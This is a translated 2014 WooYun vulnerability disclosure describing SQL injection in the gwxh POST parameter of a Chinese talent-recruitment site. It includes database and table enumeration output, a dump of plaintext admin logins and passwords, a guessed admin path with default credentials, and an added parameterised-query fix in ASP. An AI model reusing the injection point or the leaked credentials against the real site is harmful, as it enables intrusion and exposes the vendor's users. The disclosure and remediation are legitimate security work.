
Vulnerability summary

Defect ID: wooyun-2014-047927

Title: SQL injection on 中原人才网 (Zhongyuan Talent Network) leading to large-scale information leakage

Affected vendor: 中原人才网 (Zhongyuan Talent Network)

Author: RedFree

Submitted: 2014-01-10 12:17

Fix time: 2014-02-24 12:17

Disclosed: 2014-02-24 12:17

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-01-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-02-24: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Some page parameters on 中原人才网 are not filtered, leading to SQL injection and leakage of the database contents.

Detailed description:

Affected page: http://www.zyrc.com.cn/per/per_condi_list.asp
POST data: qfind=2&gwxh=%CF%FA%CA%DB%BE%AD%C0%ED&Submit2=%B2%E9+%D1%AF
The gwxh parameter is injectable.
All databases:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
available databases [10]:
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] rcjx
[*] tempdb
[*] test
[*] xbrc


Current database:

current database:    'xbrc'


Current user:

current user:    'rc'


All tables in the current database:

Database: xbrc
[133 tables]
+----------------------+
| ACT_FEE_TYPE |
| BBS_DETAIL |
| BBS_TITLE |
| CLASS_COURSE_TEST |
| CLASS_COURSE_TEST |
| CLASS_INFO |
| COURSE |
| DW_FEE_TYPE |
| DW_FEE_TYPE |
| DW_MSG |
| EDU_GRADE |
| EMAILGRP |
| FEE_DW |
| FEE_DW |
| FEE_YB |
| GJZW |
| HMC |
| JLHC |
| JLH_DW |
| JLH_DW |
| JLH_PARTICIPANT |
| JLH_TW |
| LOGIN |
| MaxId |
| PAGE_SUBPAGE |
| PAGE_SUBPAGE |
| PAGE_TYPE |
| PAICHUSUO |
| PER_MSG |
| PSN_TEST |
| QUESTION_TYPE |
| QUESTION_TYPE |
| RY2 |
| RY2 |
| STALL |
| SUBPAGE_QUESTION |
| SUBPAGE_QUESTION |
| TECHER_COURSE |
| TECHER_INFO |
| TECHPRO |
| TITLE |
| ZS_TYPE |
| ZS_TYPE |
| a01 |
| a02 |
| a03 |
| bdbzb |
| bys |
| condition_my |
| condition_my |
| da_brs |
| daima |
| dalei |
| dqzd |
| dtproperties |
| dwb |
| dwhy |
| dwxz |
| foreign_lan |
| forum |
| groupby1 |
| gzfs |
| hybzzd |
| hyzkzd |
| jkdmb |
| jlhryb |
| jlhxqk |
| jlhzd |
| jsslcdzd |
| jszc |
| jszzzd |
| jyqktjb |
| jyqxzd |
| link1 |
| link_old |
| link_old |
| lsb |
| member |
| minzu |
| mzzd |
| nxfzd |
| pbcatcol |
| pbcatedt |
| pbcatfmt |
| pbcattbl |
| pbcatvld |
| pylbb |
| registermember |
| research |
| rsdlbzzd |
| rytjzy |
| schoolmates |
| selectInfo |
| shop_user1 |
| shop_user1 |
| sp |
| sypqb |
| sysconstraints |
| sysjtjb |
| syssegments |
| syxqk |
| t1 |
| t2 |
| t3 |
| task |
| tempparm |
| tempparm |
| tjb22 |
| tjbcj |
| trcolcom |
| tt |
| tw_temp |
| view_Interface |
| view_condition_tj_zy |
| view_condition_tj_zy |
| view_group_xlsc |
| view_ry2 |
| view_ry_tj_zy |
| view_ry_tj_zy |
| view_ry_tj_zy |
| view_will_all |
| view_will_all |
| view_zw |
| will |
| wjsp |
| wyspzd |
| xiaolei |
| xinwen |
| xw |
| xzzw |
| zw |
| zy |
| zzmm |
+----------------------+


Data in the LOGIN table:

Table: LOGIN
[6 entries]
+---------+-----------------+---------+---------+----------------+--------+----------------+--------------------+
| xh | xm | BH | BZ | PWD | TYPE | LOGIN | regdate |
+---------+-----------------+---------+---------+----------------+--------+----------------+--------------------+
| <blank> | admin_shichang1 | <blank> | <blank> | 2012_shichang1 | mng | admin_shichang | 01 9 2007 9:43AM |
| <blank> | admin_zyrc1 | <blank> | <blank> | 2012_admin1 | mng | admin_zyrc | 01 9 2007 9:41AM |
| <blank> | dwmng | <blank> | <blank> | 2012_dwmng | dwmng | dwmng | 06 16 2011 11:00AM |
| <blank> | per_shi | <blank> | <blank> | 65956852 | permng | per_shi | 12 23 2013 3:49PM |
| <blank> | permng | <blank> | <blank> | 2012_permng | permng | permng | 05 10 2006 8:33AM |
| <blank> | zyrc_dw | <blank> | <blank> | 2012_zyrc_dw | dwmng | zyrc_dw | 01 9 2007 9:50AM |
+---------+-----------------+---------+---------+----------------+--------+----------------+--------------------+


A backend admin path was guessed:
http://www.zyrc.com.cn/dyzc/manager/index.asp
Username: admin  Password: admin123



Proof of vulnerability:

Database: xbrc
Table: dqzd
[2 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| dqdm | varchar |
| dqmc | varchar |
+--------+---------+
Database: xbrc
Table: t3
[3 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| dw | varchar |
| job_num | int |
| xh | char |
+---------+---------+
Database: xbrc
Table: FEE_YB
[10 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| BASE_MONEY | int |
| BH | varchar |
| DW_RATION | numeric |
| FEE_TIME | datetime |
| ID | int |
| MON_BASE | int |
| PSN_MONEY | int |
| PSN_RATION | numeric |
| TIME1 | datetime |
| TIME2 | datetime |
+------------+----------+
Database: xbrc
Table: PAGE_TYPE
[3 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| ID | int |
| NAME | varchar |
| XH | varchar |
+--------+---------+
Database: xbrc
Table: PSN_TEST
[6 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| BH | varchar |
| COMT | varchar |
| MARK | int |
| NOTE | varchar |
| PAGE_NO | int |
| TEST_DATE | datetime |
+-----------+----------+
……



Remediation:

Filter the input parameters.
Change the default backend admin path.
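The report identifies the defect (the gwxh value from the POST body is built into the query text of per_condi_list.asp without filtering) and the fix ("filter the parameters"). The durable form of that fix on a classic ASP / SQL Server 2000 stack is to bind the value as a parameter rather than concatenate it. The following is an added example written for this page, not code from the report or from the zyrc.com.cn site: the table name zw comes from the table list above, but the column names gwxh and zwmc, the Application("ConnString") connection string and the shape of the handler are assumptions. It shows the concatenated query pattern beside the parameterised replacement using ADODB.Command. The same report shows the application login 'rc' can enumerate every database on the server, so the database login the page uses should also be restricted to the xbrc database and the tables the page actually needs.

```vbscript
<%
Option Explicit
' Added example, not the site's own code. Table zw appears in the report's
' table list; the columns gwxh and zwmc and the connection string are assumed.

' Vulnerable pattern (the class of defect the report describes): the POST value
' is spliced into the SQL text, so a quote in gwxh ends the string literal and
' the rest of the value is interpreted as SQL.
Function BuildVulnerableSql(gwxh)
    BuildVulnerableSql = "SELECT zwmc FROM zw WHERE gwxh = '" & gwxh & "'"
End Function

' Hardened pattern: the value travels to SQL Server as a bound parameter, so
' quotes and keywords inside it are data, never syntax. Length is capped to the
' column size so oversized input is rejected by the driver rather than stored.
Function QueryPositions(conn, gwxh)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = 1                                   ' adCmdText
    cmd.CommandText = "SELECT zwmc FROM zw WHERE gwxh = ?"
    ' CreateParameter(Name, Type, Direction, Size, Value)
    ' 200 = adVarChar, 1 = adParamInput; 100 is the assumed column width.
    cmd.Parameters.Append cmd.CreateParameter("@gwxh", 200, 1, 100, Left(gwxh, 100))
    Set QueryPositions = cmd.Execute
End Function

Dim conn, rs
Set conn = Server.CreateObject("ADODB.Connection")
' Connection string assumed to be held in Application state; the login it names
' should have SELECT on the needed xbrc tables only, not access to every database.
conn.Open Application("ConnString")

Set rs = QueryPositions(conn, Request.Form("gwxh"))
Do Until rs.EOF
    ' Output is HTML-encoded so stored values cannot inject markup into the page.
    Response.Write Server.HTMLEncode(rs("zwmc")) & "<br>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```

The POST value in the report is GBK-encoded (%CF%FA%CA%DB%BE%AD%C0%ED), which is fine for a bound parameter; what must not happen is any code path, including the qfind branch, that falls back to string concatenation for the same field. Whether to treat a value as injectable should be checked per parameter, not per page.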

Copyright notice: please credit the source when reposting: RedFree@乌云 (WooYun)


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused the report